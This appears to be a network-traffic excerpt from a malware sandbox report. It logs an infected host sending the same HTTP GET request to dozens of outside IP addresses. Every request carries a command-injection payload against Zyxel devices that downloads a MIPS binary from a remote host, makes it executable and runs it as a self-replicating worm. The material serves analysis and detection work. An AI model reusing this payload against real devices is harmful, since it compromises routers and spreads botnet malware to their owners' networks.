                                                        Feb 2, 2024 06:21:17.068707943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6149192.168.2.1459410137.206.12.61443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.068728924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6150192.168.2.1441264116.175.180.234443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.068772078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6151192.168.2.146065235.6.211.251443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.068809032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6152192.168.2.1449380205.88.18.214443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.068864107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6153192.168.2.145380072.202.14.175443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.068906069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6154192.168.2.1443064192.98.154.230443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.068931103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6155192.168.2.1459448158.124.187.103443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.068972111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6156192.168.2.1460582210.133.22.115443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.069005966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6157192.168.2.1454802117.158.162.111443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.069061041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6158192.168.2.1440640115.209.118.198443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.069097996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6159192.168.2.1445832142.169.51.166443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.069130898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6160192.168.2.1445058208.224.217.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.069164991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6161192.168.2.1447028113.39.248.162443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.069219112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6162192.168.2.1445976161.49.157.104443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.069247007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6163192.168.2.144368680.24.251.240443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.069278955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6164192.168.2.1436942182.125.255.90443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.069305897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6165192.168.2.144237282.37.235.118443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.069360018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6166192.168.2.1432942108.171.140.76443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.069411039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6167192.168.2.1454558184.91.142.50443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.069449902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6168192.168.2.145694089.156.66.22443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.069495916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6169192.168.2.145281476.64.227.52443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.069535971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6170192.168.2.1447214101.143.175.146443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.069572926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6171192.168.2.145654617.120.242.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.069598913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6172192.168.2.144847448.42.254.185443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.069648981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6173192.168.2.1454690211.76.38.193443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.069686890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6174192.168.2.1453048179.24.174.89443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.069726944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6175192.168.2.1451454186.254.168.18443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.069762945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6176192.168.2.1458512126.221.179.112443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.069806099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6177192.168.2.1460164202.146.30.113443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.069842100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6178192.168.2.144990452.173.100.17443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.069885015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6179192.168.2.1446440213.116.205.145443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.069921970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6180192.168.2.145089225.121.166.22443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.069947958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6181192.168.2.143491627.244.139.18443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.069996119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6182192.168.2.1452670150.122.31.23443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.070033073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6183192.168.2.144542280.193.228.59443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.070080996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6184192.168.2.1439580119.170.119.241443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.070120096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6185192.168.2.1453100151.103.12.121443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.070166111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6186192.168.2.144998073.97.54.173443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.070187092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6187192.168.2.144219627.241.49.76443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.070240021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6188192.168.2.145240870.138.196.108443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.070280075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6189192.168.2.144566291.55.101.61443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.070331097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6190192.168.2.1441162130.0.0.121443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.070362091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6191192.168.2.1442060116.214.121.119443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.070398092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6192192.168.2.1439576108.83.206.149443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.070441961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6193192.168.2.1450004101.132.24.144443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.070477962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6194192.168.2.1458272163.31.209.112443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.070506096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6195192.168.2.1438196170.235.29.125443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.070558071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6196192.168.2.1441190157.151.5.120443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.070596933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6197192.168.2.1456052164.148.230.159443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.070641994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6198192.168.2.143500279.107.27.63443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.070684910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6199192.168.2.143427647.154.140.227443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.070727110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6200192.168.2.1452342159.120.195.206443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.070772886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6201192.168.2.1449998223.71.240.207443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.070799112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6202192.168.2.145302417.125.70.98443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.070844889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6203192.168.2.145906671.124.33.29443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.070900917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6204192.168.2.144777073.195.168.67443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.071031094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6205192.168.2.1448200121.241.124.198443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.071063042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6206192.168.2.143290457.46.162.78443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.071108103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6207192.168.2.144858459.126.71.169443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.071131945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6208192.168.2.145943068.170.25.15443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.071173906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6209192.168.2.145800470.78.95.174443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.071208954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6210192.168.2.1446806176.100.123.61443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.071254015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6211192.168.2.1448936203.33.133.153443
                                                        TimestampBytes transferredDirectionData
